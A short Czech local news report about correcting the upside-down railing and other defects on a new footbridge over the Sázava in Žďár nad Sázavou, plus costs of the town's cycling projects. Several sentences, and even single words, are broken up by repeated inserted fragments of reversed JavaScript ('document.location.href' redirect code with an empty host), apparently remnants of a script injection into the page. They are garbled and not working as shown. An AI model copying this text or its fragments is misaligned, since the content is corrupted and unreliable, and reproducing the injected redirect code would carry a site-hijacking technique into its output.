Rainbow page separator

Nová lávka přes Sázavu ve Farských humnech prošla úpravami

Pondělí, 23. listopadu 2020

Žďár nad Sázavou / Správně je nyní umístěné dřevěné zábradlí nové lávky přes řeku Sázavu, která chodce i cyklisty bezpečně převádí ze Žižkovy ulice do parku ve Farských humnech a zpět. Dělníci zábradlí původně nainstalovali obráceně, takže bylo tak nízko nad vodní hladinou, že se pod ním nedalo bezpečně podplout, a vodáci i další lidé most obratem přejmenovali na Žďárskou gilotinu. Kromě [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nedostatku došlo také k odstranění nevhodných vodicích tyčí pro nevidomé i drobných prohlubní v lávce, kde se po dešti držela voda.

Přemostění Sázavy vzniklo v rámci projektu rozvoje cyklodopravy ve Žďáře, jenž se začal realizovat loni a měl pět částí. Mimo železobe[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonovou lávku mezi Farskými humny a Žižkovou ulicí šlo ještě o lávku do čtvrti Klafar, propojení Žižkovy ulice a ulice 1. máje, cyklostezku od Pilské nádrže ke Stržanovu podcházející silnici I/37 a pik[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];togramové koridory pro zvýšení bezpečnosti cyklistů v ulici Sázavská a od ulice 1. máje k nádraží. Celková cena byla vyčíslena na 30,7 milionu korun s dotací ve výši zhruba patnáct milionů.